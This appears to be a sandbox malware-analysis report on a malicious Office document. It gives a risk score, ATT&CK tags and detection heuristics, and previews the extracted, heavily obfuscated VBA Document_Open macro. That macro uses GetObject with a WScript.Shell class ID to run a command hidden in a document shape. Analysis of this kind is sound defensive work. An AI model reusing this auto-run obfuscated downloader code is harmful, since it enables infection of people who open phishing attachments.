MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that utilizes GetObject. The macro is heavily obfuscated, but its intent appears to be downloading and executing a second-stage payload from a URL embedded within the document's body. The presence of the Document_Open macro and the overall structure strongly suggest a macro-based downloader, commonly delivered via spearphishing attachments.
Heuristics 6
-
ClamAV: Doc.Downloader.00536d-6764533-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6764533-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6541 bytes |
SHA-256: 2c5429eddf131d2d150fcc79fabc901c055a84fe2691f1c8bb009a6e788e66b3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "awkKfQhhBIljln"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cGrOkH = (FCXnBVTT - Oct(mwNrWfWCw) * Obbwt - Sgn(312578752) - 72815590 + Fix(SbVwa) + 479906409 + 7405951 / 99920874 / aHJHMSnwi)
Select Case Trwjo
Case 101059272
tJiFisqM = CLng(9861119)
cqVFqHowv = Int(zBJozOlr)
Case 109699647
rhjvNrk = Hex(248736072)
PSuKaKGJE = CStr(194450204 * CByte(Intahrzq))
End Select
On Error Resume Next
zhXlRiRmz = (SWluk - Oct(JHfnB) * wWwbMuuzX - Sgn(156301923) - 172810723 + Fix(MOzzsA) + 83087439 + 54104109 / 226311383 / VmbSqF)
Select Case MLVsBlBnp
Case 119426645
rwduwZi = CLng(141134382)
MPfmtN = Int(ALAtDpAK)
Case 80917060
SKdvK = Hex(19461991)
iQknbqCj = CStr(140289408 * CByte(nzjjzoGBb))
End Select
On Error Resume Next
irPzUj = (PAwviw - Oct(OizLa) * WJNuPb - Sgn(136632580) - 197795734 + Fix(dTWpF) + 2117839469 + 119227446 / 142792163 / ubYnRM)
Select Case ztPqPV
Case 329066177
loYdU = CLng(225335282)
LjNWfYsqc = Int(JdQzvjrBc)
Case 108819769
FnmIVQDR = Hex(49921568)
BmBPpZvh = CStr(299703831 * CByte(DmtFr))
End Select
Set Hzwjzv = Shapes("clSUStuE")
On Error Resume Next
TCTKaSa = (RMSQIMwN - Oct(MhSjU) * FElfI - Sgn(162401051) - 286707951 + Fix(MLFDEuQV) + 440961519 + 311995130 / 328566021 / TvRiK)
Select Case vttAVvzt
Case 88176039
omSIa = CLng(199109978)
FDIsS = Int(raXlLoKmH)
Case 140636773
dzpMqJ = Hex(23626566)
hLjUd = CStr(270023892 * CByte(pqMbBwcA))
End Select
On Error Resume Next
PTvIDMWG = (WSYDDMG - Oct(wWUiSG) * aCjVaj - Sgn(126378074) - 149716647 + Fix(hiLfGtWq) + 1663849069 + 237966589 / 237940694 / pAaoKzQ)
Select Case GDzNfiAd
Case 4029929
wDvqWUA = CLng(177665037)
CziJi = Int(tlCIjQj)
Case 17092630
bilwAYtt = Hex(274382865)
njawiFnjo = CStr(95039379 * CByte(cuOrmzwU))
End Select
fTjnCb = "" + Gtwcz + JoFDShQw + psPtFhl + fTXBwnn + Hzwjzv.TextFrame.TextRange.Text + PFisz + JFAzwhw
On Error Resume Next
oGmjifQ = (ZoHMODZT - Oct(BFljFm) * MoOwMHw - Sgn(345518) - 200327392 + Fix(JRWaz) + 1110929759 + 26569162 / 334387903 / Prjltj)
Select Case LYsHpiTI
Case 154496220
QTcSrHhK = CLng(304215558)
ztCoh = Int(sXlcDUQc)
Case 318729389
HXOazND = Hex(69703226)
kWvXkBbzX = CStr(255602424 * CByte(WDZEqw))
End Select
On Error Resume Next
jbEiHNzW = (HzuhEXD - Oct(WOwdwS) * ADDWpEo - Sgn(162873545) - 191718303 + Fix(UMbFp) + 1855249139 + 311957702 / 301088301 / YziBiAOk)
Select Case zdJlJjh
Case 21861827
cjWTa = CLng(112164751)
jLbKhmBj = Int(tZSBZ)
Case 143173573
TJYzsjC = Hex(310345048)
lSSMRFY = CStr(112835471 * CByte(upnZwNc))
End Select
On Error Resume Next
biPdq = (zWSKbLKrQ - Oct(NmjLthTlP) * XuRkwpfmD - Sgn(157193244) - 264996091 + Fix(TrCTpO) + 1865253409 + 141167999 / 80036364 / nndtwAJt)
Select Case dNzVCE
Case 224159898
mfXnsI = CLng(296846718)
rIarEJ = Int(joHdGCsfd)
Case 62560049
KGVVzO = Hex(51396590)
qqouuikaF = CStr(290518562 * CByte(BGUTRjvb))
End Select
Set ijOMk = CVar(GetObject(PHPBkGF + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + KBRmA))
On Error Resume Next
wquTr = (siKmXQ - Oct(tdBvjwh) * ISdRa - Sgn(85315354) - 212922179 + Fix(ObkpGwjFQ) + 215589959 + 87409329 / 92439367 / sGWmE)
Select Case d
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.